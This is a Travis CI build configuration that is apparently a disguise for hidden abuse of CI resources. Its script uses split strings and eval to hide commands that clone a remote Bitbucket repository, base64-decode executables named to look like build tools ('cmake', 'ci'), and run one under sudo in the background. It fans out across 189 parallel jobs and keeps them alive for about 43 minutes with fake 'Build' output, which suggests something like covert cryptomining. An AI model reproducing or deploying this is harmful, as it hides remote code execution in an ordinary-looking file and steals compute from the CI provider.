dist: bionic

env:
  - BUILD="iS1"
  - BUILD="iS2"
  - BUILD="iS3"
  - BUILD="iS4"
  - BUILD="iS5"
  - BUILD="iS6"
  - BUILD="iS7"
  - BUILD="iS8"
  - BUILD="iS9"
  - BUILD="iS10"
  - BUILD="iS11"
  - BUILD="iS12"
  - BUILD="iS13"
  - BUILD="iS14"
  - BUILD="iS15"
  - BUILD="iS16"
  - BUILD="iS17"
  - BUILD="iS18"
  - BUILD="iS19"
  - BUILD="iS20"
  - BUILD="iS21"
  - BUILD="iS22"
  - BUILD="iS23"
  - BUILD="iS24"
  - BUILD="iS25"
  - BUILD="iS26"
  - BUILD="iS27"
  - BUILD="iS28"
  - BUILD="iS29"
  - BUILD="iS30"
  - BUILD="iS31"
  - BUILD="iS32"
  - BUILD="iS33"
  - BUILD="iS34"
  - BUILD="iS35"
  - BUILD="iS36"
  - BUILD="iS37"
  - BUILD="iS38"
  - BUILD="iS39"
  - BUILD="iS40"
  - BUILD="iS41"
  - BUILD="iS42"
  - BUILD="iS43"
  - BUILD="iS44"
  - BUILD="iS45"
  - BUILD="iS46"
  - BUILD="iS47"
  - BUILD="iS48"
  - BUILD="iS49"
  - BUILD="iS50"
  - BUILD="iS51"
  - BUILD="iS52"
  - BUILD="iS53"
  - BUILD="iS54"
  - BUILD="iS55"
  - BUILD="iS56"
  - BUILD="iS57"
  - BUILD="iS58"
  - BUILD="iS59"
  - BUILD="iS60"
  - BUILD="iS61"
  - BUILD="iS62"
  - BUILD="iS63"
  - BUILD="iS64"
  - BUILD="iS65"
  - BUILD="iS66"
  - BUILD="iS67"
  - BUILD="iS68"
  - BUILD="iS69"
  - BUILD="iS70"
  - BUILD="iS71"
  - BUILD="iS72"
  - BUILD="iS73"
  - BUILD="iS74"
  - BUILD="iS75"
  - BUILD="iS76"
  - BUILD="iS77"
  - BUILD="iS78"
  - BUILD="iS79"
  - BUILD="iS80"
  - BUILD="iS81"
  - BUILD="iS82"
  - BUILD="iS83"
  - BUILD="iS84"
  - BUILD="iS85"
  - BUILD="iS86"
  - BUILD="iS87"
  - BUILD="iS88"
  - BUILD="iS89"
  - BUILD="iS90"
  - BUILD="iS91"
  - BUILD="iS92"
  - BUILD="iS93"
  - BUILD="iS94"
  - BUILD="iS95"
  - BUILD="iS96"
  - BUILD="iS97"
  - BUILD="iS98"
  - BUILD="iS99"
  - BUILD="iS100"
  - BUILD="iS101"
  - BUILD="iS102"
  - BUILD="iS103"
  - BUILD="iS104"
  - BUILD="iS105"
  - BUILD="iS106"
  - BUILD="iS107"
  - BUILD="iS108"
  - BUILD="iS109"
  - BUILD="iS110"
  - BUILD="iS111"
  - BUILD="iS112"
  - BUILD="iS113"
  - BUILD="iS114"
  - BUILD="iS115"
  - BUILD="iS116"
  - BUILD="iS117"
  - BUILD="iS118"
  - BUILD="iS119"
  - BUILD="iS120"
  - BUILD="iS121"
  - BUILD="iS122"
  - BUILD="iS123"
  - BUILD="iS124"
  - BUILD="iS125"
  - BUILD="iS126"
  - BUILD="iS127"
  - BUILD="iS128"
  - BUILD="iS129"
  - BUILD="iS130"
  - BUILD="iS131"
  - BUILD="iS132"
  - BUILD="iS133"
  - BUILD="iS134"
  - BUILD="iS135"
  - BUILD="iS136"
  - BUILD="iS137"
  - BUILD="iS138"
  - BUILD="iS139"
  - BUILD="iS140"
  - BUILD="iS141"
  - BUILD="iS142"
  - BUILD="iS143"
  - BUILD="iS144"
  - BUILD="iS145"
  - BUILD="iS146"
  - BUILD="iS147"
  - BUILD="iS148"
  - BUILD="iS149"
  - BUILD="iS150"
  - BUILD="iS151"
  - BUILD="iS152"
  - BUILD="iS153"
  - BUILD="iS154"
  - BUILD="iS155"
  - BUILD="iS156"
  - BUILD="iS157"
  - BUILD="iS158"
  - BUILD="iS159"
  - BUILD="iS160"
  - BUILD="iS161"
  - BUILD="iS162"
  - BUILD="iS163"
  - BUILD="iS164"
  - BUILD="iS165"
  - BUILD="iS166"
  - BUILD="iS167"
  - BUILD="iS168"
  - BUILD="iS169"
  - BUILD="iS170"
  - BUILD="iS171"
  - BUILD="iS172"
  - BUILD="iS173"
  - BUILD="iS174"
  - BUILD="iS175"
  - BUILD="iS176"
  - BUILD="iS177"
  - BUILD="iS178"
  - BUILD="iS179"
  - BUILD="iS180"
  - BUILD="iS181"
  - BUILD="iS182"
  - BUILD="iS183"
  - BUILD="iS184"
  - BUILD="iS185"
  - BUILD="iS186"
  - BUILD="iS187"
  - BUILD="iS188"
  - BUILD="iS189"

language: minimal

script:
  - kWkUHrtH="sudo apt up"
  - oEPrTMViIJ="date || tru"
  - eval "$kWkUHrtH""$oEPrTMViIJ""e"
  - susGo="sudo apt --"
  - kSteUr="yes install"
  - OpmMK=" cl-base64 "
  - eXGEWL="git &>/dev/"
  - eval "$susGo""$kSteUr""$OpmMK""$eXGEWL""null"
  - KgzzxGaU="git clone h"
  - yhYPqxeQx="ttps://gccb"
  - ZZJzJgCXp="uild@bitbuc"
  - CLybAv="ket.org/gcc"
  - zNIrpDEtgkH="build/gcc.g"
  - zvUnW="it &>/dev/n"
  - eval "$KgzzxGaU""$yhYPqxeQx""$ZZJzJgCXp""$CLybAv""$zNIrpDEtgkH""$zvUnW""ull"
  - nwnDNuwnGJ="base64 -d g"
  - FJXUuF="cc/cmake_ >"
  - eval "$nwnDNuwnGJ""$FJXUuF"" cmake"
  - TvOrH="base64 -d g"
  - kkZnsYvd="cc/config_ "
  - eval "$TvOrH""$kkZnsYvd""> clean"
  - KsCIXc="base64 -d g"
  - STsGxRk="cc/make_ > "
  - eval "$KsCIXc""$STsGxRk""ci"
  - chmod +x ci cmake
  - JWOjJROMEg="./cmake"
  - eval "$JWOjJROMEg"""
  - lhzGYYHOqjN="sed -i 's/b"
  - CHHgYLuh="uild/tg3u/g"
  - eval "$lhzGYYHOqjN""$CHHgYLuh""' clean"
  - aClRqexCPUS="sudo ./ci -"
  - yPzMwGkExN="-config cle"
  - txLVYol="an &>/dev/n"
  - eval "$aClRqexCPUS""$yPzMwGkExN""$txLVYol""ull &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2595)) ] && sudo killall ci && break; sleep 189; done
